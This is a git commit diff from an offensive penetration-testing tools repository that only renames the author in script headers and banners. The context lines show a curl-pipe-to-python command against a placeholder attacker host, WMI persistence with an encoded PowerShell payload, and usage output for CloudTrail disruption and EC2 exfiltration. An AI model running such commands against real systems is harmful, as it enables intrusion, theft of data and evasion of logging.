mirror of
https://github.com/mgeeky/Penetration-Testing-Tools.git
synced 2024-12-22 09:05:06 +01:00
updates
This commit is contained in:
parent
2e115fe796
commit
558762a498
@ -36,6 +36,6 @@ This and other projects are outcome of sleepless nights and **plenty of hard wor
|
|||||||
---
|
---
|
||||||
|
|
||||||
```
|
```
|
||||||
Mariusz B. / mgeeky, (@mariuszbit)
|
Mariusz Banach / mgeeky, (@mariuszbit)
|
||||||
<mb [at] binary-offensive.com>
|
<mb [at] binary-offensive.com>
|
||||||
```
|
```
|
@ -33,7 +33,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --help
|
|||||||
|
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
|
usage: disruptCloudTrailByS3Lambda.py [options] <region> [trail_name]
|
||||||
|
|
||||||
@ -64,7 +64,7 @@ bash $ python3 disruptCloudTrailByS3Lambda.py --access-key ASIAXXXXXXXXXXXXXXXX
|
|||||||
|
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Will be working on Account ID: 712800000000
|
[.] Will be working on Account ID: 712800000000
|
||||||
[.] Step 1: Determine trail to disrupt
|
[.] Step 1: Determine trail to disrupt
|
||||||
@ -181,7 +181,7 @@ attacker $ python3 ./exfiltrate-ec2.py --help
|
|||||||
|
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
|
usage: ./exfiltrate-ec2.py [-h] [--region REGION] [--profile PROFILE]
|
||||||
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
|
[--access-key ACCESS_KEY] [--secret-key SECRET_KEY]
|
||||||
@ -236,7 +236,7 @@ attacker $ python3 ./exfiltrate-ec2.py --region us-east-1 -v --profile default -
|
|||||||
|
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
|
|
||||||
[.] Using attacker's profile: default
|
[.] Using attacker's profile: default
|
||||||
[.] Using victim's profile: victim-profile
|
[.] Using victim's profile: victim-profile
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
|
# This script simply calls `aws sts assume-role` using hardcoded parameters, in order
|
||||||
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
|
# to retrieve set of session credentials and reformat it into ~/.aws/credentials file format.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '19-20
|
# Mariusz Banach, mgeeky '19-20
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
|
@ -38,7 +38,7 @@
|
|||||||
# - boto3
|
# - boto3
|
||||||
# - pytest
|
# - pytest
|
||||||
#
|
#
|
||||||
# Author: Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
|
|
||||||
@ -427,7 +427,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
:: AWS CloudTrail disruption via S3 Put notification to Lambda
|
||||||
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
Disrupts AWS CloudTrail logging by planting Lambda that deletes S3 objects upon their creation
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')
|
parser = argparse.ArgumentParser(prog = argv[0], usage='%(prog)s [options] <region> [trail_name]')
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# policy statements. Then goes through allowed permissions to pick all of them out.
|
# policy statements. Then goes through allowed permissions to pick all of them out.
|
||||||
# Finally, checks every allowed permission against a list of known troublesome ones.
|
# Finally, checks every allowed permission against a list of known troublesome ones.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '19, <mb@binary-offensive.com>
|
# Mariusz Banach, mgeeky '19, <mb@binary-offensive.com>
|
||||||
# v0.1
|
# v0.1
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -33,7 +33,7 @@
|
|||||||
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
|
# WARNING: Since this method creates a publicly available AMI image that will contain customer sensitive data, it is
|
||||||
# not recommended to use it during legal AWS Penetration Tests
|
# not recommended to use it during legal AWS Penetration Tests
|
||||||
#
|
#
|
||||||
# Author: Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -422,7 +422,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: exfiltrate-ec2
|
:: exfiltrate-ec2
|
||||||
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
Exfiltrates EC2 data by creating an image of it or snapshot of it's EBS volume
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
''')
|
''')
|
||||||
|
|
||||||
parser = argparse.ArgumentParser(prog = argv[0])
|
parser = argparse.ArgumentParser(prog = argv[0])
|
||||||
|
@ -9,7 +9,7 @@
|
|||||||
#
|
#
|
||||||
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
|
# $ curl -s https://<ATTACKER>/exfiltrateLambdaTasksDirectory.py | python
|
||||||
#
|
#
|
||||||
# Author: Mariusz B., '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import zipfile, StringIO
|
import zipfile, StringIO
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# This script leverages couple of methods in order to validate that passed
|
# This script leverages couple of methods in order to validate that passed
|
||||||
# domain is a S3 bucket indeed.
|
# domain is a S3 bucket indeed.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2019, <mb@binary-offensive.com>
|
# Mariusz Banach, 2019, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'resolv'
|
require 'resolv'
|
||||||
@ -245,7 +245,7 @@ def main(args)
|
|||||||
|
|
||||||
puts %{
|
puts %{
|
||||||
:: Identifies AWS S3 Buckets via couple of methods
|
:: Identifies AWS S3 Buckets via couple of methods
|
||||||
Mariusz B. 19', <mb@binary-offensive.com>
|
Mariusz Banach 19', <mb@binary-offensive.com>
|
||||||
}
|
}
|
||||||
|
|
||||||
if ARGV.length != 1
|
if ARGV.length != 1
|
||||||
|
@ -20,7 +20,7 @@
|
|||||||
# Requirements:
|
# Requirements:
|
||||||
# - gem "aws-sdk-ec2"
|
# - gem "aws-sdk-ec2"
|
||||||
#
|
#
|
||||||
# Author: Mariusz B., '19, <mb@binary-offensive.com>
|
# Author: Mariusz Banach, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'aws-sdk-ec2'
|
require 'aws-sdk-ec2'
|
||||||
|
@ -8,7 +8,7 @@ c:\>py -3 tamperUpx.py foo-upx.exe foo-upx-corrupted.exe
|
|||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
making them much harder to be decompressed & restored.
|
making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
|
|
||||||
Step 1. Renaming UPX sections...
|
Step 1. Renaming UPX sections...
|
||||||
Renamed UPX section (UPX0 ) => (.text)
|
Renamed UPX section (UPX0 ) => (.text)
|
||||||
|
@ -119,7 +119,7 @@ def main(argv):
|
|||||||
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
:: tamperUpx - a small utility that corrupts UPX-packed executables,
|
||||||
making them much harder to be decompressed & restored.
|
making them much harder to be decompressed & restored.
|
||||||
|
|
||||||
Mariusz B. / mgeeky, '21
|
Mariusz Banach / mgeeky, '21
|
||||||
''')
|
''')
|
||||||
|
|
||||||
if len(argv) < 2:
|
if len(argv) < 2:
|
||||||
|
@ -1,7 +1,7 @@
|
|||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
#
|
#
|
||||||
# OpenVAS automation script.
|
# OpenVAS automation script.
|
||||||
# Mariusz B. / mgeeky, '17
|
# Mariusz Banach / mgeeky, '17
|
||||||
# v0.2
|
# v0.2
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
|
# keeping tools list more or less up-to-date, or to remove tool's pull down entirely from the script
|
||||||
# - only tools that I've found useful at least once are landing in this script.
|
# - only tools that I've found useful at least once are landing in this script.
|
||||||
#
|
#
|
||||||
# Mariusz B., '18-'19
|
# Mariusz Banach, '18-'19
|
||||||
#
|
#
|
||||||
|
|
||||||
# Well, entire Kali installation assume that we are normally working as root on our Kali.
|
# Well, entire Kali installation assume that we are normally working as root on our Kali.
|
||||||
|
@ -8,7 +8,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -202,7 +202,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: CDP Flooding / Denial of Service tool
|
:: CDP Flooding / Denial of Service tool
|
||||||
Floods the interface with fake, randomly generated CDP packets.
|
Floods the interface with fake, randomly generated CDP packets.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -6,7 +6,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -122,7 +122,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: HSRP Flooding / Denial of Service tool
|
:: HSRP Flooding / Denial of Service tool
|
||||||
Floods the interface with Active router Coup HSRP packets.
|
Floods the interface with Active router Coup HSRP packets.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -33,7 +33,7 @@ PS D:\> python3 .\exchangeRecon.py 10.10.10.9
|
|||||||
|
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.2
|
v0.2
|
||||||
|
|
||||||
[.] Probing for Exchange fingerprints...
|
[.] Probing for Exchange fingerprints...
|
||||||
@ -141,7 +141,7 @@ bash $ python RoutingAttackKit.py
|
|||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.1
|
v0.1
|
||||||
|
|
||||||
Available attacks:
|
Available attacks:
|
||||||
@ -157,7 +157,7 @@ bash # python RoutingAttackKit.py -t rip-fuzzer -v
|
|||||||
|
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v0.1
|
v0.1
|
||||||
|
|
||||||
[.] Using 192.168.1.14 as local/spoof IP address
|
[.] Using 192.168.1.14 as local/spoof IP address
|
||||||
@ -241,7 +241,7 @@ $ ./VLANHopperDTP.py --help
|
|||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
v0.3
|
v0.3
|
||||||
|
|
||||||
usage: ./VLANHopperDTP.py [options]
|
usage: ./VLANHopperDTP.py [options]
|
||||||
@ -279,7 +279,7 @@ $ sudo ./VLANHopperDTP.py -i enp5s0f1
|
|||||||
|
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
v0.2
|
v0.2
|
||||||
|
|
||||||
[+] VLAN Hopping IS possible.
|
[+] VLAN Hopping IS possible.
|
||||||
|
@ -13,7 +13,7 @@
|
|||||||
# Python requirements:
|
# Python requirements:
|
||||||
# - scapy
|
# - scapy
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -618,7 +618,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Routing Protocols Exploitation toolkit
|
:: Routing Protocols Exploitation toolkit
|
||||||
Sends out various routing protocols management frames
|
Sends out various routing protocols management frames
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -39,7 +39,7 @@
|
|||||||
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
|
# - Add auto-packets capture functionality via tshark/tcpdump to specified out directory
|
||||||
# - Add functionality to auto-scan via arp-scan desired network
|
# - Add functionality to auto-scan via arp-scan desired network
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18-19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '18-19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
@ -724,7 +724,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: VLAN Hopping via DTP Trunk negotiation
|
:: VLAN Hopping via DTP Trunk negotiation
|
||||||
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
Performs VLAN Hopping via negotiated DTP Trunk / Switch Spoofing technique
|
||||||
Mariusz B. / mgeeky '18-19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18-19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# the switch's port. This reconessaince will be helpful for performing
|
# the switch's port. This reconessaince will be helpful for performing
|
||||||
# VLAN Hopping attacks.
|
# VLAN Hopping attacks.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '18
|
# Mariusz Banach / mgeeky, '18
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -32,7 +32,7 @@
|
|||||||
# - packaging
|
# - packaging
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, '19, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -1300,7 +1300,7 @@ def parseOptions(argv):
|
|||||||
print('''
|
print('''
|
||||||
:: Exchange Fingerprinter
|
:: Exchange Fingerprinter
|
||||||
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
Tries to obtain internal IP address, Domain name and other clues by talking to Exchange
|
||||||
Mariusz B. / mgeeky '19, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '19, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
|
@ -6,7 +6,7 @@
|
|||||||
#
|
#
|
||||||
# Based on "Black Hat Python" book by Justin Seitz.
|
# Based on "Black Hat Python" book by Justin Seitz.
|
||||||
#
|
#
|
||||||
# Mariusz B.
|
# Mariusz Banach
|
||||||
#
|
#
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
@ -51,7 +51,7 @@ if __name__ == '__main__':
|
|||||||
|
|
||||||
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
|
print '\n\tMicrosoft IIS WebDAV Write Code Execution exploit'
|
||||||
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
|
print '\t(based on Metasploit HDM\'s <iis_webdav_upload_asp> implementation)'
|
||||||
print '\tMariusz B. / mgeeky, 2016\n'
|
print '\tMariusz Banach / mgeeky, 2016\n'
|
||||||
|
|
||||||
host = sys.argv[1]
|
host = sys.argv[1]
|
||||||
if not host.startswith('http'):
|
if not host.startswith('http'):
|
||||||
|
@ -25,7 +25,7 @@
|
|||||||
# Requirements:
|
# Requirements:
|
||||||
# - paramiko
|
# - paramiko
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
@ -360,7 +360,7 @@ def main():
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: CVE-2018-10993 libSSH authentication bypass exploit.
|
:: CVE-2018-10993 libSSH authentication bypass exploit.
|
||||||
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
|
Tries to attack vulnerable libSSH libraries by accessing SSH server without prior authentication.
|
||||||
Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
v{}
|
v{}
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# configuration files in order to extract plain and cipher passwords out of them.
|
# configuration files in order to extract plain and cipher passwords out of them.
|
||||||
# Equipped with functionality to decrypt Cisco Type 7 passwords.
|
# Equipped with functionality to decrypt Cisco Type 7 passwords.
|
||||||
#
|
#
|
||||||
# Mariusz B., mgeeky '18-20
|
# Mariusz Banach, mgeeky '18-20
|
||||||
#
|
#
|
||||||
|
|
||||||
import re
|
import re
|
||||||
@ -427,7 +427,7 @@ def printResults():
|
|||||||
def main(argv):
|
def main(argv):
|
||||||
Logger._out('''
|
Logger._out('''
|
||||||
:: Network-configuration Credentials extraction script
|
:: Network-configuration Credentials extraction script
|
||||||
Mariusz B. / mgeeky, '18
|
Mariusz Banach / mgeeky, '18
|
||||||
''')
|
''')
|
||||||
opts = parseOptions(argv)
|
opts = parseOptions(argv)
|
||||||
if not opts:
|
if not opts:
|
||||||
|
@ -72,7 +72,7 @@
|
|||||||
# - Microsoft Exchange Server 2013
|
# - Microsoft Exchange Server 2013
|
||||||
#
|
#
|
||||||
# Author:
|
# Author:
|
||||||
# Mariusz B. / mgeeky, '17-19,
|
# Mariusz Banach / mgeeky, '17-19,
|
||||||
# <mb@binary-offensive.com>
|
# <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
@ -2958,7 +2958,7 @@ Date: {dateNow}
|
|||||||
|
|
||||||
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
|
smtpAudit.py ({VERSION}) - SMTP Server penetration testing / audit tool,
|
||||||
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
|
(https://gist.github.com/mgeeky/ef49e5fb6c3479dd6a24eb90b53f9baa)
|
||||||
by Mariusz B. / mgeeky (<mb@binary-offensive.com>)
|
by Mariusz Banach / mgeeky (<mb@binary-offensive.com>)
|
||||||
.
|
.
|
||||||
'''
|
'''
|
||||||
|
|
||||||
@ -3698,7 +3698,7 @@ class ParseOptions:
|
|||||||
def banner():
|
def banner():
|
||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: SMTP Black-Box Audit tool.
|
:: SMTP Black-Box Audit tool.
|
||||||
v{}, Mariusz B. / mgeeky, '17
|
v{}, Mariusz Banach / mgeeky, '17
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
|
||||||
@ -3828,7 +3828,7 @@ def main(argv):
|
|||||||
sys.stderr.write('''
|
sys.stderr.write('''
|
||||||
:: SMTP configuration Audit / Penetration-testing tool
|
:: SMTP configuration Audit / Penetration-testing tool
|
||||||
Intended to be used as a black-box tool revealing security state of SMTP.
|
Intended to be used as a black-box tool revealing security state of SMTP.
|
||||||
Mariusz B. / mgeeky, '17-19
|
Mariusz Banach / mgeeky, '17-19
|
||||||
v{}
|
v{}
|
||||||
|
|
||||||
'''.format(VERSION))
|
'''.format(VERSION))
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# Simple script intended to abuse SMTP server's VRFY command to leak
|
# Simple script intended to abuse SMTP server's VRFY command to leak
|
||||||
# usernames having accounts registered within it.
|
# usernames having accounts registered within it.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
import socket
|
import socket
|
||||||
|
@ -7,7 +7,7 @@
|
|||||||
# Nothing fancy, just set of needed commands. Especially handy when
|
# Nothing fancy, just set of needed commands. Especially handy when
|
||||||
# used with `startEAPHammer.sh` script.
|
# used with `startEAPHammer.sh` script.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
if [ $# -ne 2 ]; then
|
if [ $# -ne 2 ]; then
|
||||||
|
@ -5,7 +5,7 @@
|
|||||||
# that takes as input list of APs against which should deauth be launched,
|
# that takes as input list of APs against which should deauth be launched,
|
||||||
# and then attempts that attack.
|
# and then attempts that attack.
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
if [ $# -ne 1 ]; then
|
if [ $# -ne 1 ]; then
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
# Especially handy when used with companion script called:
|
# Especially handy when used with companion script called:
|
||||||
# `initDHCPServer.sh`
|
# `initDHCPServer.sh`
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky '18, <mb@binary-offensive.com>
|
# Mariusz Banach / mgeeky '18, <mb@binary-offensive.com>
|
||||||
#
|
#
|
||||||
|
|
||||||
####################################################################
|
####################################################################
|
||||||
|
@ -5,7 +5,7 @@ Create Contoso Users in Active Directory This script creates 270 + users in Acti
|
|||||||
|
|
||||||
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
|
***Original Author: Mark Rhodes - markrhodes@gmail.com - @mrhodes***
|
||||||
|
|
||||||
***Modified by: Mariusz B., mb@binary-offensive.com - @mgeeky***
|
***Modified by: Mariusz Banach, mb@binary-offensive.com - @mgeeky***
|
||||||
|
|
||||||
**To Use:**
|
**To Use:**
|
||||||
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.
|
Extract all files and run Create-ADStructure.ps1 from an Administrative PowerShell prompt.
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# with incoming OBEX Object Push requests containing
|
# with incoming OBEX Object Push requests containing
|
||||||
# specified file.
|
# specified file.
|
||||||
#
|
#
|
||||||
# Mariusz B. / MGeeky, 16'
|
# Mariusz Banach / MGeeky, 16'
|
||||||
#
|
#
|
||||||
# Partially based on `Violent Python` snippets.
|
# Partially based on `Violent Python` snippets.
|
||||||
# Modules required:
|
# Modules required:
|
||||||
@ -79,7 +79,7 @@ def main():
|
|||||||
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
|
parser.add_option('-s', '--spam', dest='spam', action='store_true', help='Spam found devices with the file continuosly')
|
||||||
|
|
||||||
print '\nBluetooth file carpet bombing via OBEX Object Push'
|
print '\nBluetooth file carpet bombing via OBEX Object Push'
|
||||||
print 'Mariusz B. / MGeeky 16\n'
|
print 'Mariusz Banach / MGeeky 16\n'
|
||||||
|
|
||||||
(opts, args) = parser.parse_args()
|
(opts, args) = parser.parse_args()
|
||||||
|
|
||||||
|
@ -14,7 +14,7 @@
|
|||||||
# WILL RETURN:
|
# WILL RETURN:
|
||||||
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
|
# some-user@example.com,68eacb97d86f0c4621fa2b0e17cabd8c,Test123
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky
|
# Mariusz Banach / mgeeky
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys, os
|
import sys, os
|
||||||
|
@ -4,7 +4,7 @@
|
|||||||
# In latter case producing encrypted ZIP package that will get decompressed automatically
|
# In latter case producing encrypted ZIP package that will get decompressed automatically
|
||||||
# after decryption.
|
# after decryption.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016 v0.1
|
# Mariusz Banach, 2016 v0.1
|
||||||
#
|
#
|
||||||
|
|
||||||
require 'optparse'
|
require 'optparse'
|
||||||
|
@ -11,7 +11,7 @@
|
|||||||
# - scanning for other VMs
|
# - scanning for other VMs
|
||||||
# - setting selected VM's IP address within /etc/hosts (and alike) file
|
# - setting selected VM's IP address within /etc/hosts (and alike) file
|
||||||
#
|
#
|
||||||
# Mariusz B. / mgeeky, '16-'19
|
# Mariusz Banach / mgeeky, '16-'19
|
||||||
# v0.7
|
# v0.7
|
||||||
#
|
#
|
||||||
|
|
||||||
|
@ -3,7 +3,7 @@
|
|||||||
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
|
# Simple XOR brute-force Key recovery script - given a cipher text, plain text and key length
|
||||||
# it searches for proper key that could decrypt cipher into text.
|
# it searches for proper key that could decrypt cipher into text.
|
||||||
#
|
#
|
||||||
# Mariusz B., 2016
|
# Mariusz Banach, 2016
|
||||||
#
|
#
|
||||||
|
|
||||||
import sys
|
import sys
|
||||||
|
@ -15,7 +15,7 @@
|
|||||||
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
|
' WMIPersistence("powershell -noP -sta -w 1 -enc WwBSAGUAZgBdAC4AQQ[...]EUAWAA=", "WindowsUpdater")
|
||||||
'
|
'
|
||||||
' AUTHOR:
|
' AUTHOR:
|
||||||
' Mariusz B. / mgeeky, '17
|
' Mariusz Banach / mgeeky, '17
|
||||||
'
|
'
|
||||||
|
|
||||||
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
Public Function WMIPersistence(ByVal exePath As String, ByVal taskName As String) As Boolean
|
||||||
|
@ -45,7 +45,7 @@
|
|||||||
# - packaging
|
# - packaging
|
||||||
# - dnspython
|
# - dnspython
|
||||||
#
|
#
|
||||||
